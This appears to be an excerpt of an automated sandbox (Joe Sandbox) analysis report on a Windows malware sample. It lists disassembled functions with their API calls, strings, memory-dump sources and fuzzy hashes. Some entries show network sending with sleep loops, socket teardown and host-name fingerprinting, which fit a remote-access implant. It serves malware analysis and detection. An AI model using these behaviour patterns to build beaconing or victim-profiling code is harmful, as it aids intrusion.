__CxxThrowException@8.LIBCMT ref: 03292968

Strings

bad allocation, xrefs: 03292936

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: std::exception::exception$AllocException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 1414122017-2104205924
Opcode ID: fab2c2dd17d5ab605e057996a1c3d1d499fd91bc9ab44d177e9318ce67f843f5
Instruction ID: 39206fd23b4805596b2bd80894da8501fed3aeb00134de1b40a80475434c508e
Opcode Fuzzy Hash: fab2c2dd17d5ab605e057996a1c3d1d499fd91bc9ab44d177e9318ce67f843f5
Instruction Fuzzy Hash: 8CF02638630B0DFBFF14EB59ED049AD7BA8BB04704F14085AD9009A082DBF09AC18691

Function 032A2A1C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 032A2A2F

Part of subcall function 032A298A: ___BuildCatchObjectHelper.LIBCMT ref: 032A29C0

_UnwindNestedFrames.LIBCMT ref: 032A2A46
___FrameUnwindToState.LIBCMT ref: 032A2A54

Strings

csm, xrefs: 032A2A1E
csm, xrefs: 032A2A2B, 032A2A40, 032A2A53, 032A2A71, 032A2A81

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: 2c160b7f58689a43f0bbb782fdce0df43c343e66a8ac5fd31c0aa9e71e4285b7
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: EC011235410A0AFBCF22AF58CC44EAA7E6AEF08350F144810BC1818121D77299B1DBA0

Function 03292D6F Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03292DCA
_memcpy_s.LIBCMT ref: 03292E3B
__read.LIBCMT ref: 03292E9E
__filbuf.LIBCMT ref: 03292EBA

Part of subcall function 032959B3: __getptd_noexit.LIBCMT ref: 032959B3

_memset.LIBCMT ref: 03292EFB

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 69336d9885d9749209e554cb7181d103386cb2368780285604cb97ae0f6dc172
Instruction ID: b79abfcec2f7ceef2e733f265b24e04a9c900dba489e803f0e8055990eba9929
Opcode Fuzzy Hash: 69336d9885d9749209e554cb7181d103386cb2368780285604cb97ae0f6dc172
Instruction Fuzzy Hash: 63518635A2030EFFFF24DF69888469EB7B5AF44320F184A6BE46556190D770A9D1CB90

Function 032A5390 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13e65c264c8a25b4bbb2b00e94af10b967448786ad63ed762cd0686b3402581
Instruction ID: be96b0b6b868798491c6e3d21c9fb907a50389b15b95efe5b76db5031ad0b89c
Opcode Fuzzy Hash: a13e65c264c8a25b4bbb2b00e94af10b967448786ad63ed762cd0686b3402581
Instruction Fuzzy Hash: 6331B0B1710B05AFE720DF6DDC85B6BB7A8EB89711F144159FE48CB241E7B0D8808B90

Function 032A6E20 Relevance: 7.6, APIs: 5, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00002000,00000000), ref: 032A6E54
Sleep.KERNEL32(0000001E), ref: 032A6E62
Sleep.KERNEL32(0000001E), ref: 032A6E7E
send.WS2_32(?,?,00000000,00000000), ref: 032A6EB1
Sleep.KERNEL32(00000064), ref: 032A6EBF

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Sleep$send
String ID:
API String ID: 4079979460-0
Opcode ID: 6c0d97cb76e77e5f2ddba57578c2ed4315d9fdb319617bb80de6386a93d22a91
Instruction ID: b9ca06a226d71a801fb5467be958d1b57bf51f352968e447cbabaf9ec6728a06
Opcode Fuzzy Hash: 6c0d97cb76e77e5f2ddba57578c2ed4315d9fdb319617bb80de6386a93d22a91
Instruction Fuzzy Hash: 8521C075910B18AFE720DB6DDACCF9EBBB6EB44360F284165F804DB280C77099C0C690

Function 0329348D Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0329349B

Part of subcall function 0329364E: __FF_MSGBANNER.LIBCMT ref: 03293667
Part of subcall function 0329364E: __NMSG_WRITE.LIBCMT ref: 0329366E
Part of subcall function 0329364E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293), ref: 03293693

_free.LIBCMT ref: 032934AE

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 88a7764cfd507f6dd6931f163f25ebfb20e81edee12a4650dee5baed330932c3
Instruction ID: 774b29fa5a70d7c113d802946769373c1a18140db5015c4b6006d33d8144640a
Opcode Fuzzy Hash: 88a7764cfd507f6dd6931f163f25ebfb20e81edee12a4650dee5baed330932c3
Instruction Fuzzy Hash: 4111983E525B15EBFF23FA74AC0875D3B98AB49270B25842BE9499A140DBB5C8C086D0

Function 032A4F20 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00000000,032A54AA,?,?,?,1D2AA39B), ref: 032A4F5F
_free.LIBCMT ref: 032A4F6C
VirtualFree.KERNEL32(?,00000000,00008000,00000000,032A54AA,?,?,?,1D2AA39B), ref: 032A4F83
GetProcessHeap.KERNEL32(00000000,00000000,00000000,032A54AA,?,?,?,1D2AA39B), ref: 032A4F8C
HeapFree.KERNEL32(00000000,?,?,?,1D2AA39B), ref: 032A4F93

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Free$Heap$LibraryProcessVirtual_free
String ID:
API String ID: 3953351234-0
Opcode ID: cfd5605e7174f2b0b8b5c8272988264d36e92561dc4edd18c175d82b2b864a0a
Instruction ID: 8d8b7d34b072377252740cf15ead1c5eb00968707ec20ab44df78ea68e471dd5
Opcode Fuzzy Hash: cfd5605e7174f2b0b8b5c8272988264d36e92561dc4edd18c175d82b2b864a0a
Instruction Fuzzy Hash: C3015B71610B019BC630EB2AD888E27B3E9BBC9711B148A1CE1AAC7684D775F481CB10

Function 0329A56B Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0329A577

Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8

__getptd.LIBCMT ref: 0329A58E
__amsg_exit.LIBCMT ref: 0329A59C
__lock.LIBCMT ref: 0329A5AC
__updatetlocinfoEx_nolock.LIBCMT ref: 0329A5C0

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4a4b86eac72dd5bde690ba174620dd904798e6ce4eb0656101a0c2582b08166a
Instruction ID: 3ecf51e12635777c8d2c2511eb50a69c515f355bf005d88f8ba6861524ac2e4d
Opcode Fuzzy Hash: 4a4b86eac72dd5bde690ba174620dd904798e6ce4eb0656101a0c2582b08166a
Instruction Fuzzy Hash: 18F09A36F747119BFE61FB789806B2D73A0AF00720F65824BE516AF1C0CBE459C19B5A

Function 032A6EF0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 032A6F12
CancelIo.KERNEL32(000000FF,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F1F
InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A6F2E
closesocket.WS2_32(000000FF), ref: 032A6F3B
SetEvent.KERNEL32(?,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F48

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: c06b343b279c53a3c8de4b83ab851b452b9ff2ca3956de3190772833bd62c3e3
Instruction ID: 1937ebdcddd871e7b19c4386b585bf45256c40c06d789887525f61b85643648b
Opcode Fuzzy Hash: c06b343b279c53a3c8de4b83ab851b452b9ff2ca3956de3190772833bd62c3e3
Instruction Fuzzy Hash: E8F03671540708ABD3A0EBA5E84CFA6B7BDBB48700F108A0CF65A86284DB706444DF61

Function 03291AA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03291AB6

Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 0329208B
Part of subcall function 03292076: __CxxThrowException@8.LIBCMT ref: 032920A0
Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 032920B1

std::_Xinvalid_argument.LIBCPMT ref: 03291AED

Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 0329203E
Part of subcall function 03292029: __CxxThrowException@8.LIBCMT ref: 03292053
Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 03292064

Strings

invalid string position, xrefs: 03291AB1
string too long, xrefs: 03291AE8

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 625b0ea93cd5e82053c169b4ead113f24de2fd98b6dfac2cd920f738e9985dd8
Instruction ID: dc7086f3a0fb04c19c354c1b5480a8753fabd0afd03cb1941bdee1179aed7262
Opcode Fuzzy Hash: 625b0ea93cd5e82053c169b4ead113f24de2fd98b6dfac2cd920f738e9985dd8
Instruction Fuzzy Hash: 5A21EC337102118BEF21D96DE850A5AF79DDFA1660B14093FE151CB640D6B1ECD1C3A5

Function 03291630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0329166A

Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 0329203E
Part of subcall function 03292029: __CxxThrowException@8.LIBCMT ref: 03292053
Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 03292064

Strings

yxxx, xrefs: 0329167B
yxxx, xrefs: 032916C4
vector<T> too long, xrefs: 03291665

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long$yxxx$yxxx
API String ID: 1823113695-1517697755
Opcode ID: 4e6be790d22e7caa79dfb9d30f07e3cc24a7d7489778cb774997274f5a9ad809
Instruction ID: 9db402752a55e03d491d8a1c33ac0d7fa9239f643b9bfb5e2f7d094f2c27645d
Opcode Fuzzy Hash: 4e6be790d22e7caa79dfb9d30f07e3cc24a7d7489778cb774997274f5a9ad809
Instruction Fuzzy Hash: 6C21F5B2E103099FD709EF5DFC85A6AB7E9E394350F15822BD8059B384F770B940CA90

Function 03291490 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 032914BE

Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 0329203E
Part of subcall function 03292029: __CxxThrowException@8.LIBCMT ref: 03292053
Part of subcall function 03292029: std::exception::exception.LIBCMT ref: 03292064

Strings

yxxx, xrefs: 032914A0
vector<T> too long, xrefs: 032914B9
yxxx, xrefs: 032914CB

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long$yxxx$yxxx
API String ID: 1823113695-1517697755
Opcode ID: 692f4c4b942629bb508d6948f5334f3cb8caed2f6211027b93e32143eb174e42
Instruction ID: 92e48075bc63f67933adbbafd45b1db808f828ee0fc34cbd9488f27238a064f2
Opcode Fuzzy Hash: 692f4c4b942629bb508d6948f5334f3cb8caed2f6211027b93e32143eb174e42
Instruction Fuzzy Hash: 98F0F623B200335B8B1CA43EBC5447EA58A42E439031AD63BD813CFB89E850F8D092D0

Function 0329D0DC Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0329D110
__isleadbyte_l.LIBCMT ref: 0329D143
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,0329B799,00000109,00BFBBEF,00000003), ref: 0329D174
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0329B799,00000109,00BFBBEF,00000003), ref: 0329D1E2

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 20f1d7103953bd6cd356985e2147b959ec361612e03e4e48c6e1a43f875932a2
Instruction ID: 3673a7290ea211e4496e47c6a3bf7b6180fe5cb5a637a879a0e59ac59c7046a4
Opcode Fuzzy Hash: 20f1d7103953bd6cd356985e2147b959ec361612e03e4e48c6e1a43f875932a2
Instruction Fuzzy Hash: 3831A532A20246EFFF20EF68CC849BD7BB5BF01610F1985AAE4559B190E370D9C0EB50

Function 0329DCC8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0329DCEE

Part of subcall function 0329DB1A: __fltout2.LIBCMT ref: 0329DB45

__cftog_l.LIBCMT ref: 0329DD14
__cftoe_l.LIBCMT ref: 0329DD46

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 1e20d39ef5db10fb72c344c352c96a8792aa172f41407c940a5d686e099a9358
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: EA118C7702014AFBDF16AE88CC51CEE3F23BF19254B198816FE1859030C276C9B1BB91

Function 032A5700 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 032A571A
_memset.LIBCMT ref: 032A5738
_strncpy.LIBCMT ref: 032A5747
GetTickCount.KERNEL32 ref: 032A5762

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: CountCreateEventTick_memset_strncpy
String ID:
API String ID: 2595203753-0
Opcode ID: 119ada5e5dd73182a173e253ac1510209ee452abd18ce1d6af4e345cff36677f
Instruction ID: 6a640f41f767a649c4ea04045f15dddb4a10c130d25244b6acce519036a3f0d4
Opcode Fuzzy Hash: 119ada5e5dd73182a173e253ac1510209ee452abd18ce1d6af4e345cff36677f
Instruction Fuzzy Hash: 70F062B0640B05AFD730DF59D845B47FBF8AF04B00F10891EE6998B691E3B1B184CB95

Function 032A3570 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 032A3588
CreateThread.KERNEL32(00000000,00000000,Function_000134E0,?,00000000,00000000), ref: 032A35A2
WaitForSingleObject.KERNEL32(?,000000FF), ref: 032A35B0
CloseHandle.KERNEL32(?), ref: 032A35BA

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: bc5681751867714ee1efc04c92fcc63ec7dfbe6b5207903ac6f5bf016e78f791
Instruction ID: 082230f58f4b8255fd9ecf55c658cb77bec8bc2d318049620f17bbe904bc86a4
Opcode Fuzzy Hash: bc5681751867714ee1efc04c92fcc63ec7dfbe6b5207903ac6f5bf016e78f791
Instruction Fuzzy Hash: 40F0BB75E44318BBD710EB95AC4AF9EBB78A704750F208255FA15E72C0D6B055009BD4

Function 03291510 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03291584
std::_Xinvalid_argument.LIBCPMT ref: 0329159F

Part of subcall function 03291740: std::_Xinvalid_argument.LIBCPMT ref: 03291758
Part of subcall function 03291740: std::_Xinvalid_argument.LIBCPMT ref: 03291776
Part of subcall function 03291740: std::_Xinvalid_argument.LIBCPMT ref: 03291791

Strings

string too long, xrefs: 0329157F, 0329159A

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: f10ccdc2e9e59315c0df3174e7f379b46a4e6a7a4d4ebabe76384b4113f96a1e
Instruction ID: 39510b40c4bdc27ae3e5bd36e25c4aa5a2ac2985decb16010d26f898f3443512
Opcode Fuzzy Hash: f10ccdc2e9e59315c0df3174e7f379b46a4e6a7a4d4ebabe76384b4113f96a1e
Instruction Fuzzy Hash: 4331F8737202129FFB24D96EE88096AF3E9DF912607254A2BE156CB740C771E8D1C3A4

Function 03291A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03291A3F

Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 0329208B
Part of subcall function 03292076: __CxxThrowException@8.LIBCMT ref: 032920A0
Part of subcall function 03292076: std::exception::exception.LIBCMT ref: 032920B1

_memmove.LIBCMT ref: 03291A75

Strings

invalid string position, xrefs: 03291A3A

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 52c57e2a7812bc87599b3133c1f11fbd216c2c063f7339f8ce8a2de568138e39
Instruction ID: 62fe8cd6476c026dd68d30a76fcc9332be8b8a3bbe8db82500f5fa80f62503b2
Opcode Fuzzy Hash: 52c57e2a7812bc87599b3133c1f11fbd216c2c063f7339f8ce8a2de568138e39
Instruction Fuzzy Hash: 400144327247028BEB25C96DEC9452AB6EA9BC1544B244D1AD095CB749D6B1ECD1C350

Function 032A2795 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 032A227A: __getptd.LIBCMT ref: 032A2280
Part of subcall function 032A227A: __getptd.LIBCMT ref: 032A2290

__getptd.LIBCMT ref: 032A27A4

Part of subcall function 032944D8: __getptd_noexit.LIBCMT ref: 032944DB
Part of subcall function 032944D8: __amsg_exit.LIBCMT ref: 032944E8

__getptd.LIBCMT ref: 032A27B2

Strings

csm, xrefs: 032A27C0

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 135634702eea3cad99a0d270f4a419fbfcd7f74b66e5f02841c9d2c338727151
Instruction ID: 8c319cdb646c07ceec5cde8611de6d478598f95545854ea0a55ad4f952771739
Opcode Fuzzy Hash: 135634702eea3cad99a0d270f4a419fbfcd7f74b66e5f02841c9d2c338727151
Instruction Fuzzy Hash: C4012838824B06CFCF38DF29D840BACB7B9BF00311F68496AE0415A290CB7496D1CF61

Function 032A3DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28networkCOMMON

Download Yara Rule

APIs

Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB

gethostname.WS2_32(?,00000032), ref: 032A3DE3
_strncpy.LIBCMT ref: 032A3DEF

Strings

Remark, xrefs: 032A3DC5

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: _memset$ComputerName_strncpygethostnamelstrcpywsprintf
String ID: Remark
API String ID: 3464725772-3865500943
Opcode ID: 6fcc0e234f97b244d1ec8f4c1d589cc0020035d61e0479ca81d3b138cdb01294
Instruction ID: 966f1127cffbec293bf2b5bbe860a1004a3ad3eaafd6c00ea9d0e5ac2cb9ca70
Opcode Fuzzy Hash: 6fcc0e234f97b244d1ec8f4c1d589cc0020035d61e0479ca81d3b138cdb01294
Instruction Fuzzy Hash: 85E0261AA50A08278901E52C7C068B6BF1DC747668B0402EDEE080B201DE43084542D2

Function 03298432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 03298435

Part of subcall function 0329445F: GetLastError.KERNEL32(00000001,00000000,032959B8,032936D7,00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293), ref: 03294463
Part of subcall function 0329445F: ___set_flsgetvalue.LIBCMT ref: 03294471
Part of subcall function 0329445F: __calloc_crt.LIBCMT ref: 03294485
Part of subcall function 0329445F: DecodePointer.KERNEL32(00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293,00000000,00000000,?,03294583), ref: 0329449F
Part of subcall function 0329445F: GetCurrentThreadId.KERNEL32 ref: 032944B5
Part of subcall function 0329445F: SetLastError.KERNEL32(00000000,?,0329722C,00000000,00000001,00000000,?,0329A203,00000018,032AC6D0,0000000C,0329A293,00000000,00000000,?,03294583), ref: 032944CD

__malloc_crt.LIBCMT ref: 03298457

Part of subcall function 032959B3: __getptd_noexit.LIBCMT ref: 032959B3

Strings

Time, xrefs: 03298434

Memory Dump Source

Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true

Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd

Similarity

API ID: ErrorLast__getptd_noexit$CurrentDecodePointerThread___set_flsgetvalue__calloc_crt__malloc_crt
String ID: Time
API String ID: 2454516118-3483776891
Opcode ID: 20d0ed15f4cd0caf30daae80c2a2c2759bb554301a881009a841640b34dc1732
Instruction ID: 281e2f2a7a29ab8a5fccbe4898d20998a34e68d9d98c5b56621e423102677ec5
Opcode Fuzzy Hash: 20d0ed15f4cd0caf30daae80c2a2c2759bb554301a881009a841640b34dc1732
Instruction Fuzzy Hash: 04E01232925B32CEFF72F738B50475A62E49F41720F09145BE6688F180DBB4D8C186D1

Analysis Process: rundll32.exePID: 7352, Parent PID: 3428COMMON

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	244
Total number of Limit Nodes:	7

Executed Functions

Function 041748A0 Relevance: 51.0, APIs: 19, Strings: 10, Instructions: 208
stringsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB

